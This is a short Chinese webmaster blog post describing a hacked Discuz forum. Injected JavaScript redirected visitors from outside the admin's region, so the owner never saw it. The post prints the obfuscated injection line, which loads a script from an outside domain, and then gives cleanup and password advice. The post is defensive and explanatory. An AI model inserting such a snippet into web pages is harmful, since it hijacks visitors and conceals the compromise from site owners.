域名預(yù)訂/競(jìng)價(jià),好“米”不錯(cuò)過
你是否遇到過你的網(wǎng)站打開一會(huì)就自動(dòng)跳轉(zhuǎn)到其他頁面,而且這個(gè)問題是你的用戶告訴你的,而你自己卻沒有遇到?
discuz掛馬彈出頁面
經(jīng)過蔥子我細(xì)心的對(duì)掛馬網(wǎng)站做排查,終于讓我找到了問題所在。
掛馬者是通過在discuz的頭部js文件里面添加了劫持js代碼,通過判斷訪問者的IP來實(shí)現(xiàn)不同跳轉(zhuǎn)的。
具體代碼如下:
document.write("<\163"+"cript src='http://\141"+"d.\172"+"om"+"12\63"+".n"+"et/i"+"p.asp?l"+"oc=chengdu'><\/s"+"cript>");
可以看出,后面有個(gè)“chengdu”代碼,這段代碼的意思就是IP為成都地區(qū)的訪問者在訪問被掛馬頁面時(shí)不做跳轉(zhuǎn)。其余地區(qū)的IP訪問者則跳轉(zhuǎn)。
從這段代碼我們就可以看出掛馬者是多么的用心險(xiǎn)惡。
他首先根據(jù)你網(wǎng)站所在地進(jìn)行判斷網(wǎng)站管理員經(jīng)常使用的IP地址所在地,然后有針對(duì)性的對(duì)網(wǎng)站管理員不做跳轉(zhuǎn)劫持。
所以,這種劫持的情況下,網(wǎng)站管理者非常難以發(fā)現(xiàn)到網(wǎng)站被掛馬了。
解決辦法也比較簡(jiǎn)單:
首先校驗(yàn)下原始文件,對(duì)比下哪些js文件近期有被改動(dòng)過,然后針對(duì)被改動(dòng)過的js文件做以上代碼段的排除。找到以上代碼段后,刪除即可。
最后說一下,各位網(wǎng)站管理者一定要注意保管好網(wǎng)站和服務(wù)器的管理密碼,盡量設(shè)置的復(fù)雜一點(diǎn)。同時(shí)也要及時(shí)檢測(cè)服務(wù)器是否存在漏洞等,及時(shí)做針對(duì)性處理,以避免類似的事情再發(fā)生。
以上文章為向上的蔥子(QQ:2190906550)原創(chuàng),轉(zhuǎn)載請(qǐng)注明出處。
原文地址:
申請(qǐng)創(chuàng)業(yè)報(bào)道,分享創(chuàng)業(yè)好點(diǎn)子。點(diǎn)擊此處,共同探討創(chuàng)業(yè)新機(jī)遇!